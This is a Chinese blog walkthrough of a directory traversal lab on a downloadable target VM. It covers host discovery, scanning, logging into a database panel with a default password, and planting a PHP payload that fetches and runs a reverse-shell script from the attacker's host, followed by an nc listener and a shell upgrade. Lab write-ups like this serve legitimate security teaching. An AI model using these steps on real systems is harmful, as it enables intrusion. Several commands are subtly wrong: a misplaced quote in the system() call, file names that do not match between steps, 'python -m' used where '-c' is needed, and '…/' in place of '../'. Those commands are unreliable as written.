目录遍历漏洞

在开始之前,先介绍一下目录遍历漏洞的原理
目录遍历漏洞原理比较简单,就是程序在实现上没有充分过滤用户输入的…/之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。这里的目录跳转符可以是…/,也可是…/的ASCII编码或者是unicode编码等。

靶机

链接:https://pan.baidu.com/s/1rkcs2rhBPch3Q5beSZJ4Rg
提取码:20td

漏洞复现过程

  1. 使用netdiscover发现存活主机
netdiscover -i eth0

在这里插入图片描述

  1. 使用nmap进行服务探测
nmap -sV 172.20.10.9

在这里插入图片描述

  1. 使用nmap时并没有发现有明显的可利用漏洞,因此使用OWSAP_ZAP进行web漏洞扫描
  • 使用OWSAP_ZAP时发现目标网站存在目录遍历漏洞
  • 访问目标的URL地址,得到以下信息
    在这里插入图片描述
    在这里插入图片描述
  • 不难发现,页面返回的是/etc/passwd的秘密文件信息
  1. 使用dirb进行目录挖掘
dirb http://172.20.10.9
  • 发现了dbadmin后台数据库,尝试使用admin密码登录成功
  • 若在实战中尝试失败,可以利用sql-post注入等使用sqlmap进行密码爆破
    在这里插入图片描述
    在这里插入图片描述
  1. 进入数据库后,点击创建一个shell.php数据库
    在这里插入图片描述
    在这里插入图片描述
  2. 生成一个php的shellcode代码,用于反弹网站的webshell
cd /usr/share/webshells/php
cp php-reverse-shell.php /root/Desktop/shell.php
  • 编辑shellcode.php文件,IP地址设置为本机ip,端口为自己想要侦听的端口
    在这里插入图片描述
  1. 完善数据库信息,在Default Value值出填入以下代码用于执行shellcode
    在这里插入图片描述
  • 要在Default Value填入的字段
<?php system("cd /tmp;wget http://172.20.10.7:8000/shellcode.php;chmod +x shell.php;php shell.php);"?>
  1. 使用python快速搭建一个http的web服务,默认开启的是8000端口
python -m "SimpleHTTPServer"
  1. 使用nc命令监听4444端口
nc -nlvp 4444
  1. 将最后的etc%2Fpasswd字段值替换为/usr/databases/shell.php即可反弹webshell
    在这里插入图片描述
  • 反弹成功
    在这里插入图片描述
  1. 使用python命令优化终端
python -m "import pty; pty.spawn('/bin/bash')"
  • 成功获取www-data用户权限
    在这里插入图片描述
  • 9
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值